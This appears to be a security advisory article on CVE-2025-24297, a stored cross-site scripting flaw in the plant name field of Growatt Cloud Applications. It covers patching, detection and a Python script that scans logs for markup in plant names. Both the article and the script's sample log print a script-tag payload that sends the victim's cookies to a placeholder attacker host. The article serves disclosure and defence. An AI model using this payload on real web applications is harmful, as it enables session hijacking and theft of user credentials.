Growatt Cloud Applications at Risk: Unpacking CVE-2025-24297 Stored XSS Vulnerability

A critical stored XSS vulnerability (CVE-2025-24297) in Growatt Cloud Applications allows attackers to inject malicious JavaScript, posing severe risks to user privacy and system integrity.

Introduction

Stored cross-site scripting (XSS) vulnerabilities remain among the most dangerous web application threats, capable of compromising user privacy, data integrity, and system security. The recently disclosed CVE-2025-24297 exposes Growatt Cloud Applications to severe risks, allowing attackers to inject malicious JavaScript directly into user-facing components. This flaw, rated critical with a CVSS v3.1 score of 9.8, demands immediate attention and remediation.

Affected Systems and Versions

Specific version details have not been disclosed publicly. Users of Growatt Cloud Applications should consult the vendor's advisory and apply available patches immediately to mitigate risk.

Technical Information

Vulnerability Mechanism

CVE-2025-24297 is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The vulnerability specifically affects the 'plant name' field within Growatt Cloud Applications, which lacks proper server-side input validation. Attackers exploit this by injecting malicious JavaScript payloads into the plant name, which the application then stores persistently in its database.

Attack Vectors and Exploitation Methods

Attackers can exploit this vulnerability by crafting malicious plant names such as:

<script>fetch('https://malicious.domain/steal-cookie?data='+document.cookie)</script>

When legitimate users access the compromised plant details, the stored script executes in their browsers, potentially exfiltrating session cookies, credentials, or manipulating user interactions.

Proof of Concept

Currently, no publicly available proof-of-concept exploit code has been disclosed for CVE-2025-24297.

Patch Information

Growatt has released patches addressing CVE-2025-24297. Users should immediately update to the latest version available from Growatt's official support channels. Specific version numbers and direct patch links have not been publicly disclosed; users should contact Growatt directly for detailed patching instructions.

Detection Methods

Detailed detection methods or indicators of compromise specific to CVE-2025-24297 have not been disclosed. However, monitoring web application logs for unusual plant name modifications containing script tags or JavaScript payloads is advised.
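
The log review suggested above can be sketched as follows. This is an added example, not code from Growatt or from the original article. The log layout, the `plantName` field name and the sample lines are assumptions constructed for illustration. Values are decoded before matching so that URL-encoded or entity-encoded markup is not missed.

```python
import html
import re
from urllib.parse import unquote_plus

# Assumed log layout: plant name logged as plantName="..." or plantName=<token>.
FIELD = re.compile(r'plantName=(?:"([^"]*)"|(\S+))')

# Heuristic: a plant name should never contain an HTML tag or a javascript: URL.
MARKUP = re.compile(r"<\s*/?\s*[a-z][^<>]*>|javascript\s*:", re.IGNORECASE)


def normalize(value, max_rounds=3):
    """Undo URL and HTML-entity encoding (possibly nested) before matching."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_plant_names(log_lines):
    """Return (line_number, decoded_name) for plant names containing markup."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = FIELD.search(line)
        if not match:
            continue  # request did not touch the plant name
        raw = match.group(1) if match.group(1) is not None else match.group(2)
        name = normalize(raw)
        if MARKUP.search(name):
            hits.append((number, name))
    return hits


# Constructed sample log lines for illustration; not from a real deployment.
SAMPLE_LOG = """\
2025-04-01T10:00:01Z POST /plant/update user=alice plantName="Rooftop Array 1"
2025-04-01T10:02:13Z POST /plant/update user=bob plantName="<script>fetch('https://malicious.domain/steal-cookie?data='+document.cookie)</script>"
2025-04-01T10:05:40Z POST /plant/update user=carol plantName=%3CScRiPt%3Ealert(1)%3C%2FsCrIpT%3E
2025-04-01T10:07:02Z POST /plant/update user=dave plantName="Garage &lt;script&gt;alert(1)&lt;/script&gt;"
2025-04-01T10:09:55Z GET /plant/list user=erin
2025-04-01T10:11:20Z POST /plant/update user=frank plantName="Solar+Farm+%232"
""".splitlines()

if __name__ == "__main__":
    for number, name in suspicious_plant_names(SAMPLE_LOG):
        print(f"line {number}: suspicious plant name {name!r}")
```

To use it on real logs, adjust `FIELD` to however the deployment actually records plant name changes; hits are triage leads and should be confirmed against the stored value.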

Vendor Security History

Growatt's security history includes multiple vulnerabilities related to inadequate input validation and authorization bypass, as highlighted in recent ICS advisories. This pattern suggests systemic security weaknesses within their cloud application architecture.

Conclusion

The disclosure of CVE-2025-24297 underscores the critical importance of rigorous input validation and secure coding practices. Organizations utilizing Growatt Cloud Applications must act swiftly to apply available patches and implement robust security measures to protect against potential exploitation. Vigilance and proactive security management remain essential to safeguarding critical infrastructure and user data.
